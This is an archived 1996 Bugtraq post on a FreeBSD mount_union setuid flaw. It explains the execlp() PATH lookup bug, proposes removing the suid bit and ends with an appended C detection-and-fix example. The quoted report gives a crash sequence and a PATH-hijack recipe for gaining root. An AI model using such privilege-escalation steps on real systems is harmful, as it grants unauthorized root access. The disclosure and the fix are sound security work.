Bugtraq mailing list archives
Re: BoS: SECURITY BUG in FreeBSD
From: root () edmweb com (Steve Reid)
Date: Fri, 17 May 1996 15:45:18 -0700
FreeBSD has a security hole...
dangerous is mount_union if suid is set
vulnerable systems are: FreeBSD 2.1 RELEASE/2.2 CURRENT
probably FreeBSD 2.1 STABLE is not vulnerable
to crash system (as a normal user) try this:

mkdir a
mkdir b
mount_union ~/a ~/b
mount_union -b ~/a ~/b

Hmm.... Needless to say, I've done a "chmod a-s /sbin/mount*" on all of the FreeBSD machines I operate (all are 2.1.0-RELEASE with minor changes). Ordinary users shouldn't be allowed to mount anything, anyway.
to get euid try this:

export PATH=/tmp:$PATH #if zsh, of course
echo /bin/sh >/tmp/modload
chmod +x /tmp/modload
mount_union /dir1 /dir2

and you are root!

Obviously, mount_union is depending on modload being on the $PATH, rather
than using "/sbin/modload". It seems this is not a bug in mount_union
itself, but in getvfsent.c...
/usr/src/lib/libc/gen/getvfsent.c:
[deletia]
        snprintf(name_mod, sizeof name_mod, "%s%s", name, "_mod");
        status = execlp("modload", "modload", "-e", name_mod, "-o", name_mod,
                        "-u", "-q", path, (const char *)0);
        exit(status ? errno : 0);
}
[EOF]
Clearly, execlp() should be calling modload as "/sbin/modload" instead.
Because this is a bug in getvfsent.c and not mount_union, it's possible
that other mount_* commands would have the same hole if suid root.
chmod a-s /sbin/mount*
=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/) |
| Email: steve () edmweb com Home Page: http://www.edmweb.com/steve/ |
| PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 |
| -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. -- |
===================================================================:)
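The PATH dependence described in the post, as an added example that is not part of the original message or of the FreeBSD source: a check that reports when an execlp()-style lookup of a helper name would resolve to something other than the intended binary, next to the call rewritten with an absolute path. The function names and the fixed environment passed to execve() are assumptions made for this illustration.

```c
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Walk `path` the way execlp() does for a name without a slash and copy the
 * first executable regular file into `out`. Returns 0 on a hit, -1 if none.
 * An empty PATH element stands for the current directory. */
int resolve_like_execlp(const char *name, const char *path,
                        char *out, size_t outlen)
{
    const char *p = path;
    struct stat st;
    while (p != NULL) {
        const char *colon = strchr(p, ':');
        size_t dlen = colon ? (size_t)(colon - p) : strlen(p);
        if (dlen == 0)
            snprintf(out, outlen, "./%s", name);
        else
            snprintf(out, outlen, "%.*s/%s", (int)dlen, p, name);
        if (stat(out, &st) == 0 && S_ISREG(st.st_mode) &&
            access(out, X_OK) == 0)
            return 0;
        p = colon ? colon + 1 : NULL;
    }
    out[0] = '\0';
    return -1;
}

/* 1 if a PATH lookup of `name` would run a file other than `trusted`;
 * 0 if it resolves to `trusted` or to nothing at all. */
int path_lookup_diverges(const char *name, const char *path,
                         const char *trusted)
{
    char hit[1024];
    if (resolve_like_execlp(name, path, hit, sizeof hit) != 0)
        return 0;
    return strcmp(hit, trusted) != 0;
}

/* The call from the post with the lookup removed: absolute path, and a
 * fixed environment (the environment is an addition, not from the post). */
int exec_modload_fixed(const char *name_mod, const char *path)
{
    char *const envp[] = { "PATH=/sbin:/bin:/usr/sbin:/usr/bin", NULL };
    char *const argv[] = { "modload", "-e", (char *)name_mod, "-o",
                           (char *)name_mod, "-u", "-q", (char *)path, NULL };
    return execve("/sbin/modload", argv, envp);
}
```

Calling path_lookup_diverges("modload", getenv("PATH"), "/sbin/modload") from a test harness shows whether the inherited PATH would redirect the helper lookup.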
